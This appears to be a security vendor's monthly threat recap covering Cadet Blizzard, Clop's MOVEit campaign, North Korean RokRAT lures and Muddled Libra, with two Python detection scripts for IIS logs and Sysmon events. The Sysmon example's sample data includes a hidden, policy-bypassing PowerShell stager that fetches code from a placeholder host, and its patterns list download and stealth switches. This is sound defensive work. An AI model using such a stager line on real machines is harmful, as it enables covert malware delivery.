Forge Charged News: The Most Electrifying News From June 2023

Forge News | Detection Strategies
July 25, 2023

The Anvilogic Forge team provides a recap of monthly trending threats. The community intelligence we collect is molded into actionable defense strategies to help defend your organization from the biggest emerging threats. 

What’s Surging? Our Picks of The Most Thunderous News From June 2023

(1) Cadet Blizzard Recognized as the Culprit of Russian Data Wiper Malware

Category: Threat Actor Activity | Source: Microsoft

Microsoft has renamed the Russian threat group previously tracked as DEV-0586 to 'Cadet Blizzard,' the actor responsible for a series of destructive and disruptive cyber operations against Ukraine. "Cadet Blizzard seeks to conduct disruption, destruction, and information collection, using whatever means are available and sometimes acting in a haphazard fashion," said Microsoft. The group's most prominent activity is the development and deployment of the WhisperGate data wiper in January 2022, although its activity dates back to at least 2020. Cadet Blizzard is also responsible for several defacements of Ukrainian websites and for hack-and-leak operations publicized on the 'Free Civilian' Telegram channel. Its targets span multiple verticals, including consulting, emergency services, government, law enforcement, and technology, with a consistent geographic focus on Ukraine, Europe, Central Asia, and Latin America; those targets may shift with the objectives set by the Russian military.

"Cadet Blizzard actors are active seven days of the week and have conducted their operations during their primary European targets’ off-business hours. Microsoft assesses NATO member states involved in providing military aid to Ukraine are at greater risk." Operators from Cadet Blizzard have favored the use of compromised credentials to gain access to exposed servers, web shells, tunneling tools, and “living off the land” techniques to maintain a low profile on target networks. In January and June 2022, seemingly at the height of the Russia and Ukraine conflict, Cadet Blizzard’s activity peaked and noticeably decreased in the following months. It wasn't until January 2023; Microsoft observed the group resurfacing with the defacement attacks. Whilst Cadet Blizzard is involved with destructive cyber operations, Microsoft notes the group's success rate isn't to the level of Russia's other GRU-affiliated threat groups such as APT28 (Strontium, Fancy Bear), APT29 (Cozy Bear), Gamaredon Group (Shuckworm) and Sandworm (Iridium).

(2) CVE-2023-34362: Signs of Clop's MOVEit Campaign Date Back to 2021

Category: Vulnerability | Sources: BleepingComputer, Huntress, Kroll

Analysis of activity around the MOVEit Transfer vulnerability, CVE-2023-34362, suggests Clop had been preparing its exploitation since 2021. Researchers from Kroll correlated activity across compromised client environments and found patterns indicating the Clop operators had meticulously planned automated, mass exploitation of the vulnerability. "Kroll’s review of Microsoft Internet Information Services (IIS) logs of impacted clients found evidence of similar activity occurring in multiple client environments last year (April 2022) and in some cases as early as July 2021." A key indicator of the organized campaign was web traffic in which GET requests retrieved the target's org_id. "This collection of the Org ID would allow for victim categorization and data inventorying by Clop on a per-exfiltration operation," said Kroll.

In a historical review of logs, the IP addresses 92.51.2.10, 92.118.36.112, and 92.118.36.233 issued GET requests for the value of an organization ID. Kroll explains the "observed activity consistent with MOVEit Transfer exploitation that collectively occurred on April 27, 2022, May 15–16, 2023, and May 22, 2023, indicating actors were testing access to organizations via likely automated means and pulling back information from the MOVEit Transfer servers to identify which organization they were accessing." Kroll observed a significant increase in the scale of these requests on May 15th, 2023, in the lead-up to mass exploitation in late May. The pattern matched earlier, manually executed commands against MOVEit Transfer servers in July 2021, suggesting the ransomware gang waited until it possessed the tooling needed to execute the final attack in late May 2023.
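
To turn Kroll's observations into a check a defender can run against their own MOVEit Transfer servers, here is an added example (not Kroll's or Anvilogic's code) that sweeps IIS W3C logs for the same pattern: GET requests that pull back an org_id, requests from the three source addresses named above, and a one-day jump in request volume from a single source. The log excerpt is constructed for the example, the request paths (/api/v1/token, /api/v1/folders, /human.aspx) and the org_id query parameter are assumed for illustration, and the burst threshold is arbitrary.

```python
"""Sweep IIS W3C logs from a MOVEit Transfer server for the reconnaissance
pattern Kroll describes above. Added example, not Kroll's or Anvilogic's
code; the log excerpt is constructed and the request paths and the org_id
query parameter are assumed for illustration."""
from collections import Counter

# Source addresses Kroll associated with the org_id requests (from the text above).
KROLL_IPS = {"92.51.2.10", "92.118.36.112", "92.118.36.233"}

# Constructed IIS W3C extended log excerpt (not a real capture). The '#Fields'
# directive names the columns, so the parser follows the site's own logging
# configuration instead of assuming a fixed layout.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2022-04-27 03:12:44 10.0.0.5 GET /api/v1/token - 92.51.2.10 - 200
2022-04-27 03:12:45 10.0.0.5 GET /api/v1/folders org_id=1 92.51.2.10 - 200
2023-05-15 22:01:03 10.0.0.5 GET /human.aspx - 203.0.113.9 Mozilla/5.0 200
2023-05-15 22:01:10 10.0.0.5 GET /api/v1/folders org_id=1 92.118.36.112 - 200
2023-05-15 22:01:11 10.0.0.5 GET /api/v1/folders org_id=1 92.118.36.112 - 200
2023-05-15 22:01:12 10.0.0.5 GET /api/v1/folders org_id=1 92.118.36.112 - 200
2023-05-15 22:01:13 10.0.0.5 GET /api/v1/folders org_id=1 92.118.36.233 - 200
2023-05-22 09:15:21 10.0.0.5 GET /api/v1/folders org_id=1 92.118.36.233 - 200
2023-05-23 11:00:00 10.0.0.5 GET /human.aspx - 198.51.100.7 Mozilla/5.0 200
"""


def parse_w3c(text):
    """Parse IIS W3C extended format into dicts keyed by the '#Fields' names."""
    fields, records = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # drop malformed rows rather than misalign columns
        records.append(dict(zip(fields, parts)))
    return records


def org_id_requests(records):
    """GET requests whose query string asks for an org_id (Kroll's key indicator)."""
    return [r for r in records
            if r.get("cs-method") == "GET"
            and "org_id" in r.get("cs-uri-query", "").lower()]


def known_ip_requests(records):
    """Any request from the source addresses published in Kroll's analysis."""
    return [r for r in records if r.get("c-ip") in KROLL_IPS]


def daily_bursts(records, threshold):
    """Per-day, per-source request counts at or above the threshold: the jump
    in scale Kroll saw in the lead-up to mass exploitation."""
    counts = Counter((r["date"], r["c-ip"]) for r in records)
    return {key: n for key, n in counts.items() if n >= threshold}


def triage(text, threshold=3):
    """Summarise the log: when and from where org_id probing occurred."""
    records = parse_w3c(text)
    recon = org_id_requests(records)
    return {
        "recon_dates": sorted({r["date"] for r in recon}),
        "recon_sources": sorted({r["c-ip"] for r in recon}),
        "known_ip_hits": len(known_ip_requests(records)),
        "bursts": daily_bursts(recon, threshold),
    }


if __name__ == "__main__":
    from pprint import pprint
    pprint(triage(SAMPLE_LOG))
```

The parser takes its column order from the #Fields directive, so it works against a site's actual logging configuration; swap SAMPLE_LOG for the contents of the server's W3SVC log directory and search from 2021 onward, since Kroll found the reconnaissance years before the mass exploitation. Treat the published addresses as a starting point, not a complete list: the org_id probing and the per-source burst are the behaviours to key on.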

BleepingComputer confirmed with a Clop representative that the ransomware gang has been actively abusing the MOVEit vulnerability, CVE-2023-34362, targeting organizations for data theft and extortion. The Clop representative confirmed they've been exploiting MOVEit since May 27th, 2023, taking advantage of the long US holiday weekend. In Clop's email communication to BleepingComputer, the ransomware gang claims to have deleted data belonging to government agencies, the military, and children’s hospitals. The Clop ransomware gang has been notifying victims through extortion notices and posting entries for compromised organizations on their data leak site since June 14th, 2023. Claiming to have breached "hundreds of companies," the ransomware gang may begin posting and showing proof of their exploits in the coming days.

(3) North Korea's ITG10 Targets South Korean Entities with RokRAT

Category: Threat Actor Activity | Source: IBM

IBM's Security X-Force has identified the North Korean APT group ITG10 conducting a large-scale campaign against South Korean entities in sectors including communications, education, energy, government, manufacturing, supply chain, think tanks, and dissident groups. ITG10 shares tactics, techniques, and procedures with APT37 (aka ScarCruft, Ricochet Chollima), leading X-Force to assess overlap between the two groups. ITG10 delivers malware, including the RokRAT remote access trojan, through malicious lure documents whose themes have included geopolitical news and its coverage, media production for broadcasts, document proposals, and an agenda for a multi-group seminar.

The decoy documents were delivered inside a ZIP or ISO container alongside a shortcut (LNK) file. Opening the shortcut runs a PowerShell script that opens the decoy document to distract the victim while RokRAT is downloaded in the background. X-Force also encountered a potentially related batch of three distinct LNK files that drop a VBS file rather than the usual batch script payload. The final payload could not be retrieved, so its capabilities remain unknown and its association with ITG10, or a further link to APT37, could not be established. "IBM X-Force assesses with high confidence that individuals and organizations holding strategic, political, or military information in connection with the Korean peninsula will see elevated threats from the DPRK, given ITG10’s previous and recent activity."
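
The execution chain X-Force describes (a shortcut inside a ZIP or ISO, PowerShell opening a decoy document while fetching the next stage, or a dropped VBS run by a script host) leaves a recognizable process-creation footprint. The following is an added example, not IBM's detection content: it scores Sysmon-style process creation events (Event ID 1 fields) for that chain. The events, command lines, paths and indicator patterns are constructed for illustration, and the scoring threshold is a tuning choice.

```python
"""Score Sysmon-style process creation events (Event ID 1 fields) for the
LNK-launched lure chain described above. Added example, not IBM X-Force's
detection content: the events, paths, command lines and indicator patterns
below are constructed for illustration."""
import re

# Script hosts a shortcut in a lure archive typically launches.
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe")

# Download primitives seen in PowerShell stagers (assumed indicator set).
DOWNLOAD_RE = re.compile(
    r"(invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|"
    r"downloadfile|net\.webclient|start-bitstransfer|\bcurl\b|\bwget\b)",
    re.IGNORECASE,
)
# A document referenced from the script: the decoy shown to the victim.
DECOY_RE = re.compile(r"\.(docx?|xlsx?|pptx?|pdf|hwp|rtf)\b", re.IGNORECASE)
# Console-hiding and policy-bypass switches typical of stagers.
STEALTH_RE = re.compile(
    r"(-w(indowstyle)?\s+hidden|-nop(rofile)?\b|-noni\b|-enc(odedcommand)?\b|"
    r"-e(xecutionpolicy|p)\s+bypass)",
    re.IGNORECASE,
)
# A .vbs executed out of a temp directory (the dropped-VBS variant).
TEMP_VBS_RE = re.compile(r"\\temp\\\S+\.vbs", re.IGNORECASE)

# Constructed events, not a real capture.
SAMPLE_EVENTS = [
    {  # shortcut on a mounted ISO: PowerShell shows the decoy and pulls the next stage
        "EventID": 1,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CurrentDirectory": "E:\\",
        "CommandLine": r'''powershell.exe -windowstyle hidden -ep bypass -c "Start-Process 'E:\seminar_agenda.docx'; (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"''',
    },
    {  # administrator running a maintenance script from a console: benign
        "EventID": 1,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CurrentDirectory": r"C:\ops",
        "CommandLine": r"powershell.exe -File C:\ops\rotate-logs.ps1",
    },
    {  # the VBS variant: shortcut drops a script and runs it with wscript
        "EventID": 1,
        "Image": r"C:\Windows\System32\wscript.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CurrentDirectory": r"C:\Users\victim\Downloads\lure",
        "CommandLine": r'wscript.exe //B "C:\Users\victim\AppData\Local\Temp\ad.vbs"',
    },
    {  # Word opened from Explorer: benign, not a script host
        "EventID": 1,
        "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CurrentDirectory": r"C:\Users\victim\Documents",
        "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\victim\Documents\notes.docx"',
    },
]


def score_event(ev):
    """Return (score, reasons) for one process-creation event; only script hosts score."""
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    cmd = ev.get("CommandLine", "")
    reasons = []
    if not image.endswith(SCRIPT_HOSTS):
        return 0, reasons
    # Double-clicking a .lnk makes explorer.exe the parent of whatever it runs.
    if parent.endswith("\\explorer.exe"):
        reasons.append("script host spawned directly by explorer.exe (LNK-style launch)")
    if STEALTH_RE.search(cmd):
        reasons.append("hidden window / policy bypass switches")
    if DOWNLOAD_RE.search(cmd):
        reasons.append("download primitive in command line")
    if DECOY_RE.search(cmd):
        reasons.append("opens a document from the script (decoy)")
    if image.endswith(("wscript.exe", "cscript.exe")) and TEMP_VBS_RE.search(cmd):
        reasons.append("wscript/cscript running a .vbs from a temp directory")
    return len(reasons), reasons


def detect(events, min_score=2):
    """Return the events whose combined indicators reach the threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= min_score:
            hits.append({"image": ev["Image"], "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit["score"], hit["image"], "|", "; ".join(hit["reasons"]))
```

A script host with explorer.exe as its parent plus a download primitive or a document reference in the same command line is the high-signal combination; each clue alone (an administrator's console session, Word opened from Explorer) stays below the threshold. When the shortcut was launched from a mounted ISO, CurrentDirectory will be a removable or virtual drive letter rather than the user's profile, which is worth surfacing as context in the alert.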

Grounding the Storm with Detections from the Forge

Muddled Libra Showcases Proficiency with Multiple Toolkits

Category: Threat Actor Activity | Source: Unit 42

Researchers at Palo Alto Networks Unit 42 track a highly proficient threat group as "Muddled Libra." The group draws on a diverse toolkit: the prominent 0ktapus phishing kit, penetration testing tools, various open-source tools, and memory forensics tools such as MAGNET RAM Capture and Volatility, which it uses to harvest credentials from memory. Notably, Unit 42 tracks Muddled Libra as a distinct group that uses the 0ktapus phishing kit, rather than folding it into previously reported clusters such as 0ktapus, Scattered Spider, and Scatter Swine. Beyond its tooling, Muddled Libra has shown resilience, adapting and persisting through network intrusions. Its social engineering combines thorough open-source research on targets with direct approaches to help desk staff to talk their way into access.

"The Muddled Libra threat group has also repeatedly demonstrated a strong understanding of the modern incident response (IR) framework. This knowledge allows them to continue progressing toward their goals even as incident responders attempt to expel them from an environment. Once established, this threat group is difficult to eradicate," said Unit42. Muddled Libra had even been shown to obtain access and erase their activity from the admin consoles of endpoint detection and response (EDR) tools. From a review of Muddled Libra's intrusions, Unit42 observed that the threat group clearly focuses on data and credential theft, usually avoiding remote execution. 

"Muddled Libra has shown a penchant for targeting a victim's downstream customers using stolen data and, if allowed, they will return repeatedly to the well to refresh their stolen dataset. Using this stolen data, the threat actor has the ability to return to prior victims even after initial incident response." This threat group is also dangerous for their desire to compromise software supply chains to cause widespread impact to gain access to high-value targets. Particular industries Muddled Libra has demonstrated interest in include cryptocurrency organizations, entities associated with outsourcing, technology, and telecommunications.

RDP/Remote Access Leads to System Defense Mod & Credential Theft

Want more? 

The Anvilogic Armory contains over 2,000 detections created by the Forge content development and research teams to help you defend your network. These trending topics can be found in our Armory with content already mapped to help you quickly deploy detection and secure your environment.
- Sign up to receive the Forge weekly threat report or see other reports
- Read more about how the Forge’s approach to detections can help create an effective threat detection strategy
